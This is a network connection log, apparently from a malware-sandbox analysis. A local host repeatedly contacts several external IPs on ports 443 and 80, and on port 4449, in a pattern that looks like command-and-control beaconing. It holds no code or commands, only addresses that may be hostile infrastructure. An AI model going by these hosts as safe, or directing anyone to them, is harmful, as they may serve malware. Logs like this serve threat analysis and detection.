Jul 27, 2024 07:46:12.566240072 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:12.566240072 CEST	62370	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:12.566288948 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:12.566318989 CEST	443	62370	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:12.679740906 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:12.679783106 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:12.679857969 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:12.680259943 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:12.680280924 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:13.298484087 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:13.298809052 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:13.301213026 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:13.301265955 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:13.301342964 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:13.301357031 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:13.301505089 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:13.301819086 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:13.301906109 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:13.614679098 CEST	62372	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:13.619812012 CEST	80	62372	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:13.619889975 CEST	62372	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:13.620168924 CEST	62372	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:13.620168924 CEST	62372	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:13.625130892 CEST	80	62372	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:13.625711918 CEST	80	62372	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:14.497263908 CEST	80	62372	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:14.497292995 CEST	80	62372	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:14.497349024 CEST	62372	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:14.497457027 CEST	62372	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:14.502459049 CEST	80	62372	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:14.561762094 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:14.561836958 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:14.561894894 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:14.575958014 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:14.575958014 CEST	62371	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:14.575977087 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:14.575988054 CEST	443	62371	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:14.576426983 CEST	62357	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:14.576683044 CEST	62373	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:14.581499100 CEST	4449	62357	193.222.96.24	192.168.2.4
Jul 27, 2024 07:46:14.581711054 CEST	4449	62373	193.222.96.24	192.168.2.4
Jul 27, 2024 07:46:14.581780910 CEST	62373	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:14.582073927 CEST	62373	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:14.587351084 CEST	4449	62373	193.222.96.24	192.168.2.4
Jul 27, 2024 07:46:14.682944059 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:14.682980061 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:14.683157921 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:14.683655024 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:14.683670044 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:15.287991047 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:15.288177967 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:15.290457010 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:15.290466070 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:15.290534973 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:15.290539980 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:15.290580034 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:15.290584087 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:15.291238070 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:15.291384935 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:15.332576036 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:16.587407112 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:16.587549925 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:16.587990046 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:16.602792025 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:16.602819920 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:16.602838039 CEST	62374	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:16.602847099 CEST	443	62374	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:16.711002111 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:16.711082935 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:16.711191893 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:16.711544991 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:16.711585999 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:17.401143074 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:17.401249886 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:17.404031992 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:17.404061079 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:17.405554056 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:17.405570984 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:17.405837059 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:17.408688068 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:17.452557087 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:18.323318958 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:18.323451042 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:18.323519945 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:18.337450027 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:18.337488890 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:18.337521076 CEST	62375	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:18.337537050 CEST	443	62375	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:18.445190907 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:18.445228100 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:18.445281982 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:18.445621967 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:18.445636034 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:19.050939083 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:19.051074982 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:19.053869963 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:19.053899050 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:19.053970098 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:19.053982019 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:19.054035902 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:19.054044962 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:19.054687023 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:19.054898024 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:19.096539021 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:20.327662945 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:20.327832937 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:20.327891111 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:20.342824936 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:20.342848063 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:20.342875004 CEST	62376	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:20.342884064 CEST	443	62376	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:20.445278883 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:20.445307970 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:20.445367098 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:20.445735931 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:20.445749998 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:21.064445019 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:21.064620018 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:21.066930056 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:21.066941977 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:21.066982031 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:21.066987038 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:21.067034960 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:21.067039013 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:21.067471981 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:21.067616940 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:21.112534046 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:22.393877983 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:22.394040108 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:22.394094944 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:22.409329891 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:22.409351110 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:22.409394026 CEST	62377	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:22.409399986 CEST	443	62377	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:22.523565054 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:22.523598909 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:22.523674011 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:22.524171114 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:22.524204016 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:23.217880964 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:23.217968941 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:23.222775936 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:23.222805023 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:23.222862005 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:23.222872972 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:23.223146915 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:23.223284960 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:23.264511108 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:23.530841112 CEST	62379	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:23.536413908 CEST	80	62379	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:23.536621094 CEST	62379	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:23.536621094 CEST	62379	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:23.536674023 CEST	62379	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:23.541718006 CEST	80	62379	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:23.542252064 CEST	80	62379	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:24.201167107 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:24.201317072 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:24.201379061 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:24.216412067 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:24.216428041 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:24.216444969 CEST	62378	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:24.216449976 CEST	443	62378	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:24.320480108 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.320521116 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:24.320785046 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.321120024 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.321145058 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:24.425877094 CEST	80	62379	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:24.425937891 CEST	80	62379	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:24.425998926 CEST	62379	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:24.426227093 CEST	62379	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:24.431082010 CEST	80	62379	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:24.924169064 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:24.924333096 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.927083015 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.927112103 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:24.927171946 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.927184105 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:24.927824974 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:24.928006887 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:24.928037882 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:26.247010946 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:26.247208118 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:26.247349977 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:26.261953115 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:26.261954069 CEST	62380	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:26.261989117 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:26.262029886 CEST	443	62380	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:26.367362022 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.367403984 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.367477894 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.368129015 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.368148088 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.973107100 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.973182917 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.975574970 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.975584030 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.975625992 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.975630999 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.975668907 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:26.975673914 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.976435900 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:26.976558924 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:27.020534992 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:28.326185942 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:28.326288939 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:28.326455116 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:28.340239048 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:28.340239048 CEST	62381	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:28.340281963 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:28.340307951 CEST	443	62381	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:28.445509911 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:28.445589066 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:28.445693016 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:28.446078062 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:28.446121931 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:29.182445049 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:29.182674885 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:29.185281992 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:29.185337067 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:29.185399055 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:29.185420990 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:29.186145067 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:29.186295033 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:29.228579044 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:30.253407001 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:30.253545046 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:30.253640890 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:30.269077063 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:30.269126892 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:30.269211054 CEST	62382	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:30.269226074 CEST	443	62382	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:30.382879972 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:30.382921934 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:30.383143902 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:30.383322001 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:30.383347988 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:31.024815083 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:31.024900913 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:31.027216911 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:31.027235031 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:31.027287960 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:31.027298927 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:31.027580976 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:31.027694941 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:31.072504997 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:32.405577898 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:32.405742884 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:32.405832052 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:32.420871973 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:32.420892000 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:32.421128988 CEST	62383	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:32.421159029 CEST	443	62383	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:32.523816109 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:32.523895979 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:32.523993969 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:32.524528980 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:32.524566889 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:33.041443110 CEST	62385	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:33.051656961 CEST	80	62385	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:33.051760912 CEST	62385	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:33.051897049 CEST	62385	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:33.051920891 CEST	62385	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:33.057914019 CEST	80	62385	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:33.057955027 CEST	80	62385	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:33.137871027 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:33.138062954 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:33.146203041 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:33.146255016 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:33.146317959 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:33.146331072 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:33.146616936 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:33.146883011 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:33.188513994 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:33.946867943 CEST	80	62385	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:33.946885109 CEST	80	62385	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:33.946962118 CEST	62385	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:33.947149038 CEST	62385	80	192.168.2.4	154.144.253.197
Jul 27, 2024 07:46:33.952426910 CEST	80	62385	154.144.253.197	192.168.2.4
Jul 27, 2024 07:46:34.491904020 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:34.491988897 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:34.492146015 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:34.506186962 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:34.506187916 CEST	62384	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:46:34.506253958 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:34.506290913 CEST	443	62384	107.173.160.139	192.168.2.4
Jul 27, 2024 07:46:34.617255926 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:34.617337942 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:34.617445946 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:34.617862940 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:34.617947102 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.289220095 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.289305925 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:35.291794062 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:35.291805029 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.291847944 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:35.291852951 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.291889906 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:35.291894913 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.292623997 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.292794943 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:35.292809010 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:35.979984045 CEST	4449	62373	193.222.96.24	192.168.2.4
Jul 27, 2024 07:46:35.980266094 CEST	62373	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:46:36.183404922 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:36.183566093 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:36.183751106 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:36.198359966 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:36.198359966 CEST	62386	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:46:36.198426008 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:36.198458910 CEST	443	62386	167.235.128.153	192.168.2.4
Jul 27, 2024 07:46:36.304842949 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.304922104 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:36.305012941 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.305474043 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.305506945 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:36.896672010 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:36.896863937 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.899451017 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.899477005 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:36.899549007 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.899561882 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:36.899831057 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:36.899982929 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:36.944521904 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:38.540422916 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:38.540630102 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:38.540719986 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:38.555469990 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:38.555529118 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:38.555573940 CEST	62387	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:46:38.555589914 CEST	443	62387	107.173.160.137	192.168.2.4
Jul 27, 2024 07:46:38.664036989 CEST	62388	443	192.168.2.4	107.173.160.139
